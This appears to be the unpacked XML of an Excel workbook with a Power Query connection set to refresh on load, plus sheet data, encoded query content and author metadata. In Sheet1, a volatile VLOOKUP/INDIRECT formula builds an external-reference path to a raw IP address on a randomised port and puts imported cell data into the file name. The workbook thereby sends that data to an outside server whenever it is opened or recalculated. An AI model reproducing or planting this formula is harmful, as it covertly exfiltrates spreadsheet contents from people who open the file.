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2"/>
  <workbookPr/>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
    <mc:Choice Requires="x15">
      <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="C:\Users\JonathanGregson\Downloads\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{0A828B2B-7867-4DF2-81DD-D8CB0E3F5311}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="2550" yWindow="2242" windowWidth="22478" windowHeight="13223" activeTab="1" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
  </bookViews>
  <sheets>
    <sheet name="file" sheetId="2" r:id="rId1"/>
    <sheet name="Sheet1" sheetId="1" r:id="rId2"/>
  </sheets>
  <definedNames>
    <definedName name="ExternalData_1" localSheetId="0" hidden="1">file!$A$1:$F$2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A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B72896-F9F2-411C-B891-D4034E1DADE6}" keepAlive="1" name="Query - file" description="Connection to the 'file' query in the workbook." type="5" refreshedVersion="8" background="1" refreshOnLoad="1">
    <dbPr connection="Provider=Microsoft.Mashup.OleDb.1;Data Source=$Workbook$;Location=file;Extended Properties=&quot;&quot;" command="SELECT * FROM [file]"/>
  </connection>
</connections>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="3" uniqueCount="3">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</sst>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1" xr16:uid="{E9CD9E6F-58E5-4EA3-BDF2-5E2D47BE6AE2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3E2C-9A7F-4578-B596-447F131897F2}" name="file" displayName="file" ref="A1:I2" tableType="queryTable" totalsRowShown="0">
  <autoFilter ref="A1:I2" xr:uid="{716A3E2C-9A7F-4578-B596-447F131897F2}"/>
  <tableColumns count="9">
    <tableColumn id="1" xr3:uid="{FD723123-0680-4E88-84A8-71DB68F45E06}" uniqueName="1" name="Column1" queryTableFieldId="1" dataDxfId="8"/>
    <tableColumn id="2" xr3:uid="{90908C62-F350-443C-B8D5-6ECC6286E922}" uniqueName="2" name="Column2" queryTableFieldId="2" dataDxfId="7"/>
    <tableColumn id="3" xr3:uid="{EE362603-D531-4842-A09D-F999B91D26B4}" uniqueName="3" name="Column3" queryTableFieldId="3" dataDxfId="6"/>
    <tableColumn id="4" xr3:uid="{FA786C81-C062-4637-A812-D42B0C62ACB2}" uniqueName="4" name="Column4" queryTableFieldId="4" dataDxfId="5"/>
    <tableColumn id="5" xr3:uid="{D729ACBD-2F9D-49FB-A19D-E7922F900592}" uniqueName="5" name="Column5" queryTableFieldId="5" dataDxfId="4"/>
    <tableColumn id="6" xr3:uid="{3EF5AFE3-7052-4FB7-8C68-510E8EB97C61}" uniqueName="6" name="Column6" queryTableFieldId="6" dataDxfId="3"/>
    <tableColumn id="7" xr3:uid="{8DBE08F9-2D55-4A0A-84C8-F8126EE7B3F6}" uniqueName="7" name="Column7" queryTableFieldId="7" dataDxfId="2"/>
    <tableColumn id="8" xr3:uid="{D66EF372-EE6F-4D87-9019-33EA6B6C9CC5}" uniqueName="8" name="Column8" queryTableFieldId="8" dataDxfId="1"/>
    <tableColumn id="9" xr3:uid="{BC2F4180-482F-4597-AC6F-241694316AB1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23D3-BB17-46AC-8469-28F759382710}">
  <dimension ref="A1:I2"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="I12" sqref="I12"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="14.25" x14ac:dyDescent="0.45"/>
  <cols>
    <col min="1" max="9" width="10.19921875" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:9" x14ac:dyDescent="0.45">
      <c r="A1"/>
      <c r="B1"/>
      <c r="C1"/>
      <c r="D1"/>
      <c r="E1"/>
      <c r="F1"/>
      <c r="G1" t="s">
        <v>0</v>
      </c>
      <c r="H1" t="s">
        <v>1</v>
      </c>
      <c r="I1" t="s">
        <v>2</v>
      </c>
    </row>
    <row r="2" spans="1:9" x14ac:dyDescent="0.45">
      <c r="A2"/>
      <c r="B2"/>
      <c r="C2"/>
      <c r="D2"/>
      <c r="E2"/>
      <c r="F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D1" sqref="D1"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="14.25" x14ac:dyDescent="0.45"/>
  <sheetData>
    <row r="1" spans="1:3" x14ac:dyDescent="0.45">
      <c r="A1" t="str">
        <f>_xlfn.CONCAT(file!2:2)</f>
        <v>six5fourthreetwo1</v>
      </c>
      <c r="B1" t="e">
        <f ca="1">VLOOKUP(A1, INDIRECT(CONCATENATE("'\\35.80.180.162@",C1,"\[", A1,"]Sheet1'!A1:A1")), 1, TRUE)</f>
        <v>#REF!</v>
      </c>
      <c r="C1">
        <f ca="1">40000+RANDBETWEEN(0,49)</f>
        <v>40007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d a 9 6 4 8 - 9 8 8 f - 4 e 2 3 - b 2 8 0 - c 8 8 d 0 5 2 9 e 5 9 a "   x m l n s = " h t t p : / / s c h e m a s . m i c r o s o f t . c o m / D a t a M a s h u p " > A A A A A O c D A A B Q S w M E F A A C A A g A I H v / V G 2 h J w i o A A A A + g A A A B I A H A B D b 2 5 m a W c v U G F j a 2 F n Z S 5 4 b W w g o h g A K K A U A A A A A A A A A A A A A A A A A A A A A A A A A A A A h c 9 B D o I w E A X Q q 5 D u 6 R S M h J C h L N x K Y k I 0 b p t S o R G K o U W 4 m w u P 5 B U k U d S d y / n / L f 4 8 b n f M p r b x r q q 3 u j M p C S g j n j K y K 7 W p U j K 4 k x + T j O N O y L O o l D d j Y 5 P J l i m p n b s k A O M 4 0 n F F u 7 6 C k L E A j v m 2 k L V q B f l g / R / 7 2 l g n j F S E 4 + E 1 h o c 0 Y D G N o j W j b M Y I S 4 G 5 N l 8 U z p s p Q / g J c T M 0 b u g V V 8 b f F w j L i f D + g z 8 B U E s D B B Q A A g A I A C B 7 /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e / 9 U w Z n C 1 9 0 A A A C C A Q A A E w A c A E Z v c m 1 1 b G F z L 1 N l Y 3 R p b 2 4 x L m 0 g o h g A K K A U A A A A A A A A A A A A A A A A A A A A A A A A A A A A d Y 8 x a 8 N A D I V 3 g / / D c V 1 s O A x 2 m w w N n S 5 p a d e 4 n b x c H M U x 2 F I 4 y a 1 L y H / v G d O h U G s R + i T e e 2 K o p S V U + 7 n n m z i K I z 4 7 D 0 d 1 a j t Q T 6 o D i S M V a k + D r y d i + T P b U j 3 0 g J I 8 h 6 v M E k o Y O N H 2 s X p n 8 F y 9 E T o 5 O 3 z x 0 D B h t a U v 7 M g d u Z p 0 M x l F p 2 Z t t D a 7 U b z 7 c N 0 A n L 0 2 S B 5 M X q y K 1 M y 2 d 9 o G m S Y E K r 8 v o I N / 6 Q 5 B o f Q O + U S + t 9 Q N P U 5 L T u a M 5 n r V M 8 2 1 U R I 2 S m C U m 1 G / v F j g 9 w v 8 Y Y G v F v j 6 D 7 + l c d T i v + 9 s f g B Q S w E C L Q A U A A I A C A A g e / 9 U b a E n C K g A A A D 6 A A A A E g A A A A A A A A A A A A A A A A A A A A A A Q 2 9 u Z m l n L 1 B h Y 2 t h Z 2 U u e G 1 s U E s B A i 0 A F A A C A A g A I H v / V A / K 6 a u k A A A A 6 Q A A A B M A A A A A A A A A A A A A A A A A 9 A A A A F t D b 2 5 0 Z W 5 0 X 1 R 5 c G V z X S 5 4 b W x Q S w E C L Q A U A A I A C A A g e / 9 U w Z n C 1 9 0 A A A C C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g A A A A A A A H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H Q m d Z R y I g L z 4 8 R W 5 0 c n k g V H l w Z T 0 i R m l s b E x h c 3 R V c G R h d G V k I i B W Y W x 1 Z T 0 i Z D I w M j I t M D c t M z F U M j I 6 M j U 6 M D A u M T U 1 M D Y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Y 2 V l Y W N h M y 1 m Y 2 M x L T Q x Y j E t O T Y 2 O S 0 z Z T U z N m E 5 M T U 2 Z T c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U v Q X V 0 b 1 J l b W 9 2 Z W R D b 2 x 1 b W 5 z M S 5 7 Q 2 9 s d W 1 u M S w w f S Z x d W 9 0 O y w m c X V v d D t T Z W N 0 a W 9 u M S 9 m a W x l L 0 F 1 d G 9 S Z W 1 v d m V k Q 2 9 s d W 1 u c z E u e 0 N v b H V t b j I s M X 0 m c X V v d D s s J n F 1 b 3 Q 7 U 2 V j d G l v b j E v Z m l s Z S 9 B d X R v U m V t b 3 Z l Z E N v b H V t b n M x L n t D b 2 x 1 b W 4 z L D J 9 J n F 1 b 3 Q 7 L C Z x d W 9 0 O 1 N l Y 3 R p b 2 4 x L 2 Z p b G U v Q X V 0 b 1 J l b W 9 2 Z W R D b 2 x 1 b W 5 z M S 5 7 Q 2 9 s d W 1 u N C w z f S Z x d W 9 0 O y w m c X V v d D t T Z W N 0 a W 9 u M S 9 m a W x l L 0 F 1 d G 9 S Z W 1 v d m V k Q 2 9 s d W 1 u c z E u e 0 N v b H V t b j U s N H 0 m c X V v d D s s J n F 1 b 3 Q 7 U 2 V j d G l v b j E v Z m l s Z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b G U v Q X V 0 b 1 J l b W 9 2 Z W R D b 2 x 1 b W 5 z M S 5 7 Q 2 9 s d W 1 u M S w w f S Z x d W 9 0 O y w m c X V v d D t T Z W N 0 a W 9 u M S 9 m a W x l L 0 F 1 d G 9 S Z W 1 v d m V k Q 2 9 s d W 1 u c z E u e 0 N v b H V t b j I s M X 0 m c X V v d D s s J n F 1 b 3 Q 7 U 2 V j d G l v b j E v Z m l s Z S 9 B d X R v U m V t b 3 Z l Z E N v b H V t b n M x L n t D b 2 x 1 b W 4 z L D J 9 J n F 1 b 3 Q 7 L C Z x d W 9 0 O 1 N l Y 3 R p b 2 4 x L 2 Z p b G U v Q X V 0 b 1 J l b W 9 2 Z W R D b 2 x 1 b W 5 z M S 5 7 Q 2 9 s d W 1 u N C w z f S Z x d W 9 0 O y w m c X V v d D t T Z W N 0 a W 9 u M S 9 m a W x l L 0 F 1 d G 9 S Z W 1 v d m V k Q 2 9 s d W 1 u c z E u e 0 N v b H V t b j U s N H 0 m c X V v d D s s J n F 1 b 3 Q 7 U 2 V j d G l v b j E v Z m l s Z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X k w J I O V Q 0 i R J h I H r 1 D F q Q A A A A A C A A A A A A A Q Z g A A A A E A A C A A A A B l d P P X V d F T C A 5 q q 3 X L Y K r U g T j 9 c R V O j R t S O o 0 J 1 W s q Z A A A A A A O g A A A A A I A A C A A A A A Z y A i 3 P x B x e w G p D W C Y d K 2 W i 6 u 5 n h n z L y 8 W B C r A Q 4 T k C 1 A A A A C E R C y S h e E p y Z I M 8 F q u x y l T c z T 8 W A / x Y V E U T w u 6 X H K + n E G K F e H Q 5 a 3 u x 0 w K Y l D B D l 5 0 d N r I 3 C J T K H r B B L / C Z j F S A d 6 Z L P Y F L K A 0 3 9 i W S I S j 6 0 A A A A C X n W i I k C 5 E F l q 5 v C U x H t 2 G 1 y w T B + 8 H X B 5 Y I o V A O a h w q v X y B 6 z W g P 7 q p G K Z K 8 f F p j 0 L 8 h / x j r 7 I B n 4 6 b T n Z q I e 3 < / D a t a M a s h u p > 
</file>

<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{1109A8EE-5299-42CA-BCCB-A40EB4E5DC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Gregson</dc:creator>
  <cp:lastModifiedBy>Jonathan Gregson</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-06-05T18:17:20Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-07-31T22:26:34Z</dcterms:modified>
</cp:coreProperties>
</file>